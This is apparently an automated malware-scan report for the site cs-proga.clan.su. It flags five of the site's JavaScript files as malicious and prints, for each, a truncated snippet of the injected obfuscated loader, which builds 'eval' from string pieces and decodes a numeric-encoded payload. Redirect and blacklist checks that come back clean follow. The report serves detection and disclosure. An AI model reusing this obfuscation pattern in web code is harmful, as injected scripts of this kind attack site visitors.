Scanned pages/files
Request | Server response | Status |
http://cs-proga.clan.su/ | 200 OK Content-Length: 57419 Content-Type: text/html | clean |
http://s23.ucoz.net/src/u.js | 200 OK Content-Length: 530 Content-Type: text/javascript | clean |
http://cs-proga.clan.su/highslide/highslide.js | 200 OK Content-Length: 50907 Content-Type: text/javascript | clean |
http://cs-proga.clan.su/js/design.js | 200 OK Content-Length: 3456 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 Antivirus reports:
| ||
http://cs-proga.clan.su/js/cookie.js | 200 OK Content-Length: 3455 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 Antivirus reports:
| ||
http://s39.ucoz.net/src/u.js | 200 OK Content-Length: 530 Content-Type: text/javascript | clean |
http://s40.ucoz.net/src/jquery-1.3.2.js | 200 OK Content-Length: 57533 Content-Type: text/javascript | clean |
http://s40.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s106.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s106.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s106.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://cs-proga.clan.su/js/cufon-yui.js | 200 OK Content-Length: 3460 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 Antivirus reports:
| ||
http://cs-proga.clan.su/js/Museo_Slab.font.js | 200 OK Content-Length: 3420 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 Antivirus reports:
| ||
http://cs-proga.clan.su/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 3440 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 Antivirus reports:
| ||
http://www.dim-cs.ru/highslide/highslide.js | 500 Can't connect to www.dim-cs.ru:80 Content-Length: 188 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cs-proga.clan.su
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Aug 2015 14:48:06 GMT
Server: uServ/3.2.2
Content-Length: 57419
Content-Type: text/html; charset=UTF-8
...57419 bytes of data.
GET / HTTP/1.1
Host: cs-proga.clan.su
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Aug 2015 14:48:06 GMT
Server: uServ/3.2.2
Content-Length: 57419
Content-Type: text/html; charset=UTF-8
...57419 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cs-proga.clan.su
Referer: http://www.google.com/search?q=cs-proga.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cs-proga.clan.su
Referer: http://www.google.com/search?q=cs-proga.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cs-proga.clan.su
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cs-proga.clan.su/
Result: cs-proga.clan.su is not infected or malware details are not published yet.
Result: cs-proga.clan.su is not infected or malware details are not published yet.